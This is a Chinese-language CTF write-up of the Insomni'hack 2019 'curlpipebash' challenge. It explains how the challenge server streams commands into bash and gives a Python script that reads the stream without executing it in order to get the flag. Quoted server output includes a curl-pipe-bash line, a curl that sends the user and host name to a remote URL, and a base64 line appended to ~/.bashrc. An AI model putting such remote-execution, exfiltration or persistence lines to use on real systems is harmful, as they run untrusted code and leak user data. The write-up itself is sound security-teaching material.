Insomni'hack teaser 2019 - Misc - curlpipebash
参考链接
题目
Welcome to Insomni'hack teaser 2019!
Execute this Bash command to print the flag 😃
curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
解题过程
curl请求的是一个stream get,对方会不断发来数据在本地执行
root@vultr:~# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash -x
+ bash
+ curl -Ns https://curlpipebash.teaser.insomnihack.ch/03280bf1-7492-4fce-bbcf-617e5a17646a
+ base64 -d
++ whoami
++ hostname
+ curl -Ns https://curlpipebash.teaser.insomnihack.ch/03280bf1-7492-4fce-bbcf-617e5a17646a/add-to-wall-of-shame/root%40vultr.guest
+ echo 'Welcome to the wall of shame!'
Welcome to the wall of shame!
这个链接https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname)看着就很气人
要获得flag,只需要阻止执行或者延迟执行curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-shame/$(whoami)%40$(hostname)就行了
import requests
headers = {
    "User-Agent": "curl/7.61.0" # if it looks like curl and talks like curl...
}
 
def main():
    url = "https://curlpipebash.teaser.insomnihack.ch/print-flag.sh"
    r = requests.get(url, headers=headers, stream=True)
    for l in r.iter_lines():
        print("print-flag got line: {}".format(l))
        if "curl" in l and "shame" not in l: # We want to curl all new urls, but not the wall of shame one!
            new_link = l.split(" ")[2] # who needs regex?..
            print("Requesting new url: {}".format(new_link))
            requests.get(new_link, headers=headers)
if __name__ == "__main__":
    main()
执行结果如下
# python get-flag.py 
print-flag got line: curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26 | bash
Requesting new url: https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26
print-flag got line: base64  -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK
print-flag got line: curl -Ns https://curlpipebash.teaser.insomnihack.ch/c69b5fdc-cfab-48d5-a130-8925dfdd2d26/add-to-wall-of-shame/$(whoami)%40$(hostname)
print-flag got line: INS{Miss me with that fishy pipe}
 
                     
                    
                 
                    
                
 
                
            
         
         浙公网安备 33010602011771号
浙公网安备 33010602011771号